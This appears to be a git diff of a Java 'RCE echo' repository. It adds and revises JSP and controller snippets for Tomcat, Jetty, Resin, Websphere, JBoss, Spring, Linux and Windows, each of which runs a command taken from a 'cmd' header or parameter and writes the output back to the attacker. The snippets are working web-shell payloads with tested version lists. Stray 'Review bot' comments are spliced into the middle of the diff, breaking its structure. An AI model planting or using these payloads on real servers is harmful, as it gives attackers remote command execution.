diff --git a/JBoss(Wildfly)/README.md b/JBoss(Wildfly)/README.md
new file mode 100644
index 0000000..fcba90d
--- /dev/null
+++ b/JBoss(Wildfly)/README.md
@@ -0,0 +1,7 @@
+# JBoss(Wildfly) 回显
+
+## 效果
+![img](https://raw.githubusercontent.com/feihong-cs/Java-Rce-Echo/master/JBoss(Wildfly)/img/JBossEcho.png)
+
+## 参考
+[https://developer.jboss.org/thread/169877](https://developer.jboss.org/thread/169877)
diff --git a/JBoss(Wildfly)/code/JBossEcho.jsp b/JBoss(Wildfly)/code/JBossEcho.jsp
new file mode 100644
index 0000000..1498b7e
--- /dev/null
+++ b/JBoss(Wildfly)/code/JBossEcho.jsp
@@ -0,0 +1,18 @@
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<%
+ io.undertow.servlet.spec.HttpServletRequestImpl req = (io.undertow.servlet.spec.HttpServletRequestImpl) javax.security.jacc.PolicyContext.getContext("javax.servlet.http.HttpServletRequest");
+ String cmd = req.getParameter("cmd");
+ if(cmd != null && !cmd.isEmpty()) {
+ java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
+ java.io.OutputStream os = req.getExchange().getOutputStream();
+
+ byte[] bytes = new byte[1024];
+ int len = 0;
+ while ((len = in.read(bytes)) != -1) {
+ os.write(bytes, 0, len);
+ }
+
+ os.close();
+ in.close();
+ }
+%>
\ No newline at end of file
diff --git a/JBoss(Wildfly)/img/JBossEcho.png b/JBoss(Wildfly)/img/JBossEcho.png
new file mode 100644
index 0000000..3abf5fe
Binary files /dev/null and b/JBoss(Wildfly)/img/JBossEcho.png differ
diff --git a/Jetty/code/jetty789Echo.jsp b/Jetty/code/jetty789Echo.jsp
index 847e28e..4028bf4 100644
--- a/Jetty/code/jetty789Echo.jsp
+++ b/Jetty/code/jetty789Echo.jsp
@@ -24,14 +24,17 @@
 obj = method.invoke(connection, null);
 method = obj.getClass().getMethod("getHeader", new Class[]{String.class});
- obj = method.invoke(obj, new Object[]{"cmd"});
+ String cmd = (String)method.invoke(obj, new Object[]{"cmd"});
- String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next();
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
- method = connection.getClass().getMethod("getPrintWriter", new Class[]{String.class});
- java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, new Object[]{"utf-8"});
- printWriter.println(res);
+ method = connection.getClass().getMethod("getPrintWriter", new Class[]{String.class});
+ java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, new Object[]{"utf-8"});
+ printWriter.println(res);
+ }
+ break;
 }else if(obj != null && obj.getClass().getName().endsWith("HttpConnection")){
 java.lang.reflect.Method method = obj.getClass().getDeclaredMethod("getHttpChannel", null);
 Object httpChannel = method.invoke(obj, null);
@@ -40,16 +43,19 @@
 obj = method.invoke(httpChannel, null);
 method = obj.getClass().getMethod("getHeader", new Class[]{String.class});
- obj = method.invoke(obj, new Object[]{"cmd"});
-
- String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next();
-
- method = httpChannel.getClass().getMethod("getResponse", null);
- obj = method.invoke(httpChannel, null);
-
- method = obj.getClass().getMethod("getWriter", null);
- java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj, null);
- printWriter.println(res);
+ String cmd = (String)method.invoke(obj, new Object[]{"cmd"});
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+
+ method = httpChannel.getClass().getMethod("getResponse", null);
+ obj = method.invoke(httpChannel, null);
+
+ method = obj.getClass().getMethod("getWriter", null);
+ java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj, null);
+ printWriter.println(res);
+ }
+
+ break;
 }
 }
 %>
\ No newline at end of file
diff --git a/Jetty/code/jetty78Echo.jsp b/Jetty/code/jetty78Echo.jsp
index 6165920..cda8dbd 100644
--- a/Jetty/code/jetty78Echo.jsp
+++ b/Jetty/code/jetty78Echo.jsp
@@ -22,13 +22,16 @@
 obj = method.invoke(connection);
 method = obj.getClass().getMethod("getHeader", String.class);
- obj = method.invoke(obj, "cmd");
+ String cmd = (String)method.invoke(obj, "cmd");
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
- String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next();
+ method = connection.getClass().getMethod("getPrintWriter", String.class);
+ java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, "utf-8");
+ printWriter.println(res);
+ }
- method = connection.getClass().getMethod("getPrintWriter", String.class);
- java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, "utf-8");
- printWriter.println(res);
+ break;
 }
 }
 %>
\ No newline at end of file
diff --git a/Jetty/code/jetty9Echo.jsp b/Jetty/code/jetty9Echo.jsp
index 67a0aff..9b5e807 100644
--- a/Jetty/code/jetty9Echo.jsp
+++ b/Jetty/code/jetty9Echo.jsp
@@ -24,16 +24,19 @@
 obj = method.invoke(httpChannel);
 method = obj.getClass().getMethod("getHeader", String.class);
- obj = method.invoke(obj, "cmd");
-
- String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next();
-
- method = httpChannel.getClass().getMethod("getResponse");
- obj = method.invoke(httpChannel);
-
- method = obj.getClass().getMethod("getWriter");
- java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj);
- printWriter.println(res);
+ String cmd = (String)method.invoke(obj, "cmd");
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+
+ method = httpChannel.getClass().getMethod("getResponse");
+ obj = method.invoke(httpChannel);
+
+ method = obj.getClass().getMethod("getWriter");
+ java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj);
+ printWriter.println(res);
+ }
+
+ break;
 }
 }
 %>
\ No newline at end of file
diff --git a/Linux/code/case2-Deprecated.jsp b/Linux/code/case2-Deprecated.jsp
new file mode 100644
index 0000000..41cd883
--- /dev/null
+++ b/Linux/code/case2-Deprecated.jsp
@@ -0,0 +1,47 @@
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<%
+ String command = "ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\"[\"}''{print $2}'|sed 's/.$//'";
+ String[] cmd = new String[]{"/bin/sh", "-c", command };
+ java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
+ java.util.List res1 = new java.util.ArrayList();
+ String line = "";
+ while ((line = br.readLine()) != null){
+ res1.add(line);
+ }
+ br.close();
+
+ Thread.sleep((long)2000);
+
+ command = "ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'";
+ cmd = new String[]{"/bin/sh", "-c", command };
+ br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
+ java.util.List res2 = new java.util.ArrayList();
+ while ((line = br.readLine()) != null){
+ res2.add(line);
+ }
+ br.close();
+
+ int index = 0;
+ int max = 0;
+ for(int i = 0; i < res1.size(); i++){
+ for(int j = 0; j < res2.size(); j++){
+ if(((String)res2.get(j)).contains((String)res1.get(i))){
+ String socketNo = ((String)res2.get(j)).split("\\s+")[1].substring(8);
+ socketNo = socketNo.substring(0, socketNo.length() - 1);
+ if(Integer.parseInt(socketNo) > max) {
+ max = Integer.parseInt(socketNo);
+ index = j;
+ }
+ }
+ }
+ }
+
+ int fd = Integer.parseInt(((String)res2.get(index)).split("\\s")[0]);
+ java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});
+ c.setAccessible(true);
+ cmd = new String[]{"/bin/sh", "-c", "echo \"It works!\"" };
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+ String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
+ java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));
+ os.write(result.getBytes());
+%>
\ No newline at end of file
diff --git a/Linux/code/case2.jsp b/Linux/code/case2.jsp
index 41cd883..d05498f 100644
--- a/Linux/code/case2.jsp
+++ b/Linux/code/case2.jsp
@@ -1,47 +1,58 @@
 <%@ page contentType="text/html;charset=UTF-8" language="java" %>
 <%
- String command = "ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\"[\"}''{print $2}'|sed 's/.$//'";
- String[] cmd = new String[]{"/bin/sh", "-c", command };
- java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
- java.util.List res1 = new java.util.ArrayList();
- String line = "";
- while ((line = br.readLine()) != null){
- res1.add(line);
- }
- br.close();
+ if(java.io.File.separator.equals("/")){
+ String command = "ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\"[\"}''{print $2}'|sed 's/.$//'";
+ String[] cmd = new String[]{"/bin/sh", "-c", command};
+ java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
+ java.util.List res1 = new java.util.ArrayList();
+ String line = "";
+ while ((line = br.readLine()) != null && !line.trim().isEmpty()){
+ res1.add(line);
+ }
+ br.close();
- Thread.sleep((long)2000);
+ try {
+ Thread.sleep((long)2000);
+ } catch (InterruptedException e) {
+ //pass
+ }
- command = "ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'";
- cmd = new String[]{"/bin/sh", "-c", command };
- br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
- java.util.List res2 = new java.util.ArrayList();
- while ((line = br.readLine()) != null){
- res2.add(line);
- }
- br.close();
+ command = "ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'";
+ cmd = new String[]{"/bin/sh", "-c", command};
+ br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
+ java.util.List res2 = new java.util.ArrayList();
+ while ((line = br.readLine()) != null && !line.trim().isEmpty()){
+ res2.add(line);
+ }
+ br.close();
- int index = 0;
- int max = 0;
- for(int i = 0; i < res1.size(); i++){
- for(int j = 0; j < res2.size(); j++){
- if(((String)res2.get(j)).contains((String)res1.get(i))){
- String socketNo = ((String)res2.get(j)).split("\\s+")[1].substring(8);
+ int index = 0;
+ int max = 0;
+ for(int i = 0; i < res2.size(); i++){
+ try{
+ String socketNo = ((String)res2.get(i)).split("\\s+")[1].substring(8);
 socketNo = socketNo.substring(0, socketNo.length() - 1);
- if(Integer.parseInt(socketNo) > max) {
- max = Integer.parseInt(socketNo);
- index = j;
+ for(int j = 0; j < res1.size(); j++){
+ if(!socketNo.equals(res1.get(j))) continue;
+
+ if(Integer.parseInt(socketNo) > max) {
+ max = Integer.parseInt(socketNo);
+ index = j;
+ }
+ break;
 }
+ }catch(Exception e){
+ //pass
 }
 }
- }
- int fd = Integer.parseInt(((String)res2.get(index)).split("\\s")[0]);
- java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});
- c.setAccessible(true);
- cmd = new String[]{"/bin/sh", "-c", "echo \"It works!\"" };
- String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
- String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
- java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));
- os.write(result.getBytes());
+ int fd = Integer.parseInt(((String)res2.get(index)).split("\\s")[0]);
+ java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});
+ c.setAccessible(true);
+ cmd = new String[]{"/bin/sh", "-c", "id"};
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+ String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
+ java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));
+ os.write(result.getBytes());
+ }
 %>
\ No newline at end of file
diff --git a/README.md b/README.md
index 3505664..6dc3acc 100644
--- a/README.md
+++ b/README.md
@@ -1,11 +1,13 @@
-# 反序列化回显
+# Java RCE 回显
-### 支持的反序列化回显测试代码
+### 支持的回显测试代码
 - [x] Linux通用回显
 - [x] Windows通用回显
 - [x] Spring回显
-- [x] Tomcat (Tested on 6.0.10/6.0.53/7.0.34/7.0.54/7.0.70/7.0.96/7.0.104/8.0.18/8.0.32/8.0.48/8.5.12/8.5.30/8.5.56/9.0.16/9.0.33, failed on 7.0.10/7.0.22)
-- [x] Weblogic
+- [x] Tomcat通用回显 (Tested on 6.0.10/6.0.53/7.0.34/7.0.54/7.0.70/7.0.96/7.0.104/8.0.18/8.0.32/8.0.48/8.5.12/8.5.30/8.5.56/9.0.16/9.0.33, failed on 7.0.10/7.0.22)
+- [x] Weblogic (Tested on 10.3.6.0, 12.1.3.0.0)
+- [x] Websphere (Tested on AppServer V8.5(8.5.5.18), AppServer V9.0(9.0.5.5))
+- [x] JBoss(Wildfly) (Testd on 8.0.0.Final, 18.0.0.Final, 21.0.0.Beta1)
 - [x] Resin (Tested on pro-4.0.64, pro-4.0.57, pro-4.0.45, pro-4.0.32, failed on pro-3.1.15)
 - [x] Jetty (Tested on 9.4.30.v20200611, 9.3.28.v20191105, 9.2.29.v20191105, 9.0.7.v20131107, 8.1.21.v20160908, 7.6.21.v20160908, failed on 8.0.3.v20160908, 7.2.1.v20101111)
diff --git a/Resin/code/resinEcho.jsp b/Resin/code/resinEcho.jsp
index d9a6b19..da00953 100644
--- a/Resin/code/resinEcho.jsp
+++ b/Resin/code/resinEcho.jsp
@@ -1,6 +1,6 @@
 <%@ page contentType="text/html;charset=UTF-8" language="java" %>
 <%
- Class clazz = Thread.currentThread().getClass();
+ Class clazz = Thread.currentThread().getClass();
 java.lang.reflect.Field field = clazz.getSuperclass().getDeclaredField("threadLocals");
 field.setAccessible(true);
 Object obj = field.get(Thread.currentThread());
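Review bot: The new `catch (InterruptedException e) { //pass }` around `Thread.sleep((long)2000)` discards the interrupt status, so a container that is trying to stop this worker thread is ignored for the rest of the scriptlet; the conventional fix is `Thread.currentThread().interrupt();` in that catch. The inner `catch(Exception e){ //pass }` added around the `split`/`substring`/`parseInt` parsing also swallows every exception type, not just the `NumberFormatException` and `IndexOutOfBoundsException` that an unparsable `ls` line produces; catching those two explicitly keeps the "skip malformed lines" intent without masking unrelated failures such as `ClassCastException`. Neither catch carries a comment explaining what is expected to fail, and `//pass` alone does not say that.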
@@ -21,14 +21,19 @@
 if(obj != null && obj.getClass().getName().equals("com.caucho.server.http.HttpRequest")){
 com.caucho.server.http.HttpRequest httpRequest = (com.caucho.server.http.HttpRequest)obj;
 String cmd = httpRequest.getHeader("cmd");
- String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
- com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse();
- httpResponse.setHeader("Content-Length", res.length() + "");
- java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream", null);
- method.setAccessible(true);
- com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null);
- httpResponseStream.write(res.getBytes(), 0, res.length());
- httpResponseStream.close();
+
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+ com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse();
+ httpResponse.setHeader("Content-Length", res.length() + "");
+ java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream", null);
+ method.setAccessible(true);
+ com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null);
+ httpResponseStream.write(res.getBytes(), 0, res.length());
+ httpResponseStream.close();
+ }
+
+ break;
 }
 }
 %>
\ No newline at end of file
diff --git a/Spring/README.md b/Spring/README.md
index 06fd49e..579a2f0 100644
--- a/Spring/README.md
+++ b/Spring/README.md
@@ -1,4 +1,4 @@
-# Spring回显
+# Spring 回显
 ## 依赖
 * Spring-web.jar
diff --git a/Spring/code/SpringMVCTestController.java b/Spring/code/SpringMVCTestController.java
index 7552318..cd936d0 100644
--- a/Spring/code/SpringMVCTestController.java
+++ b/Spring/code/SpringMVCTestController.java
@@ -19,8 +19,10 @@ public User Test() throws IOException {
 javax.servlet.http.HttpServletResponse httpresponse = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getResponse();
 String cmd = httprequest.getHeader("cmd");
- String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
- httpresponse.getWriter().println(res);
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+ httpresponse.getWriter().println(res);
+ }
 return new User();
 }
diff --git a/Spring/code/SpringWebFlowTestController.java b/Spring/code/SpringWebFlowTestController.java
index c6d73b9..82f13c6 100644
--- a/Spring/code/SpringWebFlowTestController.java
+++ b/Spring/code/SpringWebFlowTestController.java
@@ -26,8 +26,10 @@ public String test() throws IOException {
 javax.servlet.http.HttpServletResponse response = (javax.servlet.http.HttpServletResponse) servletExternalContext.getNativeResponse();
 String cmd = request.getHeader("cmd");
- String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
- response.getWriter().println(res);
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+ response.getWriter().println(res);
+ }
 return "test";
 }
diff --git "a/Tomcat/code/TomcatEchoTypeB-\345\205\250\347\211\210\346\234\254.jsp" "b/Tomcat/code/TomcatEchoTypeB-\345\205\250\347\211\210\346\234\254.jsp"
new file mode 100644
index 0000000..35c7ecd
--- /dev/null
+++ "b/Tomcat/code/TomcatEchoTypeB-\345\205\250\347\211\210\346\234\254.jsp"
@@ -0,0 +1,56 @@
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<%
+
+// 参考:
+// 《tomcat不出网回显连续剧第六集》 https://xz.aliyun.com/t/7535
+
+ boolean flag = false;
+
+ javax.management.MBeanServer mbeanServer = org.apache.tomcat.util.modeler.Registry.getRegistry((Object)null, (Object)null).getMBeanServer();
+ java.lang.reflect.Field field = Class.forName("com.sun.jmx.mbeanserver.JmxMBeanServer").getDeclaredField("mbsInterceptor");
+ field.setAccessible(true);
+ Object obj = field.get(mbeanServer);
+
+ field = Class.forName("com.sun.jmx.interceptor.DefaultMBeanServerInterceptor").getDeclaredField("repository");
+ field.setAccessible(true);
+ com.sun.jmx.mbeanserver.Repository repository = (com.sun.jmx.mbeanserver.Repository) field.get(obj);
+
+ java.util.Set objectSet = repository.query(new javax.management.ObjectName("Catalina:type=GlobalRequestProcessor,*"), null);
+ for(com.sun.jmx.mbeanserver.NamedObject namedObject : objectSet){
+ javax.management.DynamicMBean dynamicMBean = namedObject.getObject();
+ field = Class.forName("org.apache.tomcat.util.modeler.BaseModelMBean").getDeclaredField("resource");
+ field.setAccessible(true);
+ obj = field.get(dynamicMBean);
+
+ field = Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors");
+ field.setAccessible(true);
+ java.util.ArrayList procssors = (java.util.ArrayList) field.get(obj);
+
+ field = Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req");
+ field.setAccessible(true);
+ for(int i = 0; i < procssors.size(); i++){
+ org.apache.coyote.Request req = (org.apache.coyote.Request) field.get(procssors.get(i));
+ String cmd = req.getHeader("cmd");
+ if(cmd != null && !cmd.isEmpty()){
+ String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
+ byte[] result = (new java.util.Scanner((new ProcessBuilder(cmds)).start().getInputStream())).useDelimiter("\\A").next().getBytes();
+
+ Object resp = req.getClass().getMethod("getResponse", new Class[0]).invoke(req, new Object[0]);
+ try {
+ Class cls = Class.forName("org.apache.tomcat.util.buf.ByteChunk");
+ obj = cls.newInstance();
+ cls.getDeclaredMethod("setBytes", new Class[]{byte[].class, int.class, int.class}).invoke(obj, new Object[]{result, new Integer(0), new Integer(result.length)});
+ resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
+ } catch (NoSuchMethodException var5) {
+ Class cls = Class.forName("java.nio.ByteBuffer");
+ obj = cls.getDeclaredMethod("wrap", new Class[]{byte[].class}).invoke(cls, new Object[]{result});
+ resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
+ }
+
+ flag = true;
+ }
+
+ if(flag) break;
+ }
+ }
+%>
diff --git a/Websphere/README.md b/Websphere/README.md
new file mode 100644
index 0000000..6cfeb58
--- /dev/null
+++ b/Websphere/README.md
@@ -0,0 +1,5 @@
+# Websphere 回显
+
+## 效果
+![img](https://raw.githubusercontent.com/feihong-cs/Java-Rce-Echo/master/Websphere/img/001.png)
+
diff --git a/Websphere/code/websphereEcho.jsp b/Websphere/code/websphereEcho.jsp
new file mode 100644
index 0000000..b507eb7
--- /dev/null
+++ b/Websphere/code/websphereEcho.jsp
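Review bot: The local that holds the `RequestGroupInfo.processors` list is misspelled `procssors` at its declaration and in both uses in the inner `for`; renaming it `processors` matches the reflected field name and makes the two lookups easier to read together. The catch parameter `var5` on `catch (NoSuchMethodException var5)` reads like a decompiler artifact; since the exception is only used as a branch signal, `ignored` with a one-line comment such as `// no doWrite(ByteChunk) on this Response, fall back to the ByteBuffer overload` would state the intent the try/catch currently leaves implicit. The header comment only cites a reference link, so nothing in the file says which of the two `doWrite` signatures is expected on which server line; if the author verified that, it belongs next to the catch.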
@@ -0,0 +1,28 @@
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<%
+ Class clazz = Thread.currentThread().getClass();
+ java.lang.reflect.Field field = clazz.getDeclaredField("wsThreadLocals");
+ field.setAccessible(true);
+ Object obj = field.get(Thread.currentThread());
+
+ Object[] obj_arr = (Object[]) obj;
+ for(int i = 0; i < obj_arr.length; i++){
+ Object o = obj_arr[i];
+ if(o == null) continue;
+
+ if(o.getClass().getName().endsWith("WebContainerRequestState")){
+ Object req = o.getClass().getMethod("getCurrentThreadsIExtendedRequest", new Class[0]).invoke(o, new Object[0]);
+ Object resp = o.getClass().getMethod("getCurrentThreadsIExtendedResponse", new Class[0]).invoke(o, new Object[0]);
+
+ String cmd = (String) req.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(req, new Object[]{"cmd"});
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+
+ java.io.PrintWriter printWriter = (java.io.PrintWriter)resp.getClass().getMethod("getWriter", new Class[0]).invoke(resp, new Object[0]);
+ printWriter.println(res);
+ }
+
+ break;
+ }
+ }
+%>
diff --git a/Websphere/img/001.png b/Websphere/img/001.png
new file mode 100644
index 0000000..e52c345
Binary files /dev/null and b/Websphere/img/001.png differ
diff --git a/Windows/code/WindowsEcho-Deprecated.jsp b/Windows/code/WindowsEcho-Deprecated.jsp
new file mode 100644
index 0000000..fd60a1e
--- /dev/null
+++ b/Windows/code/WindowsEcho-Deprecated.jsp
@@ -0,0 +1,71 @@
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<%
+ //准备工作&初始化
+ java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField("fd");
+ field.setAccessible(true);
+
+ Class clazz1 = Class.forName("sun.nio.ch.Net");
+ java.lang.reflect.Method method1 = clazz1.getDeclaredMethod("remoteAddress",java.io.FileDescriptor.class);
+ method1.setAccessible(true);
+
+ Class clazz2 = Class.forName("java.net.SocketOutputStream", false, null);
+ java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0];
+ constructor2.setAccessible(true);
+
+ Class clazz3 = Class.forName("java.net.PlainSocketImpl");
+ java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class});
+ constructor3.setAccessible(true);
+
+ java.lang.reflect.Method write = clazz2.getDeclaredMethod("write",new Class[]{byte[].class});
+ write.setAccessible(true);
+
+ java.net.InetSocketAddress remoteAddress = null;
+ java.util.List list1 = new java.util.ArrayList();
+ java.util.List list2 = new java.util.ArrayList();
+ java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor();
+
+ //第一次尝试
+ for(int i = 0; i < 10000; i++){
+ field.set(fileDescriptor, i);
+
+ try{
+ remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor);
+ if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
+ list1.add(i);
+ }catch(Exception e){
+ //pass
+ }
+ }
+
+ //延迟2s
+ Thread.sleep(2000);
+
+ //第二次尝试
+ for(int i = 0; i < 10000; i++){
+ field.set(fileDescriptor, i);
+
+ try{
+ remoteAddress = (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor);
+ if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
+ list2.add(i);
+ }catch(Exception e){
+ //pass
+ }
+ }
+
+ //取交集
+ list1.retainAll(list2);
+
+ for(Integer fdVal : list1){
+ try{
+ field.set(fileDescriptor, fdVal);
+ Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});
+
+ String res = new java.util.Scanner(Runtime.getRuntime().exec("echo \"It works!!\"").getInputStream()).useDelimiter("\\A").next();
+ String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
+ write.invoke(socketOutputStream, new Object[]{result.getBytes()});
+ }catch (Exception e){
+ //pass
+ }
+ }
+%>
\ No newline at end of file
diff --git a/Windows/code/WindowsEcho.jsp b/Windows/code/WindowsEcho.jsp
index fd60a1e..0108ea5 100644
--- a/Windows/code/WindowsEcho.jsp
+++ b/Windows/code/WindowsEcho.jsp
@@ -1,71 +1,50 @@
 <%@ page contentType="text/html;charset=UTF-8" language="java" %>
 <%
- //准备工作&初始化
- java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField("fd");
- field.setAccessible(true);
-
- Class clazz1 = Class.forName("sun.nio.ch.Net");
- java.lang.reflect.Method method1 = clazz1.getDeclaredMethod("remoteAddress",java.io.FileDescriptor.class);
- method1.setAccessible(true);
-
- Class clazz2 = Class.forName("java.net.SocketOutputStream", false, null);
- java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0];
- constructor2.setAccessible(true);
-
- Class clazz3 = Class.forName("java.net.PlainSocketImpl");
- java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class});
- constructor3.setAccessible(true);
-
- java.lang.reflect.Method write = clazz2.getDeclaredMethod("write",new Class[]{byte[].class});
- write.setAccessible(true);
-
- java.net.InetSocketAddress remoteAddress = null;
- java.util.List list1 = new java.util.ArrayList();
- java.util.List list2 = new java.util.ArrayList();
- java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor();
-
- //第一次尝试
- for(int i = 0; i < 10000; i++){
- field.set(fileDescriptor, i);
-
- try{
- remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor);
- if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
- list1.add(i);
- }catch(Exception e){
- //pass
+ if(java.io.File.separator.equals("\\")){
+ java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField("fd");
+ field.setAccessible(true);
+
+ Class clazz1 = Class.forName("sun.nio.ch.Net");
+ java.lang.reflect.Method method1 = clazz1.getDeclaredMethod("remoteAddress",new Class[]{java.io.FileDescriptor.class});
+ method1.setAccessible(true);
+
+ Class clazz2 = Class.forName("java.net.SocketOutputStream", false, null);
+ java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0];
+ constructor2.setAccessible(true);
+
+ Class clazz3 = Class.forName("java.net.PlainSocketImpl");
+ java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class});
+ constructor3.setAccessible(true);
+
+ java.lang.reflect.Method write = clazz2.getDeclaredMethod("write",new Class[]{byte[].class});
+ write.setAccessible(true);
+
+ java.net.InetSocketAddress remoteAddress = null;
+ java.util.List list = new java.util.ArrayList();
+ java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor();
+ for(int i = 0; i < 50000; i++){
+ field.set((Object)fileDescriptor, (Object)(new Integer(i)));
+ try{
+ remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, new Object[]{fileDescriptor});
+ if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
+ if(remoteAddress.toString().startsWith("/0:0:0:0:0:0:0:1")) continue;
+ list.add(new Integer(i));
+
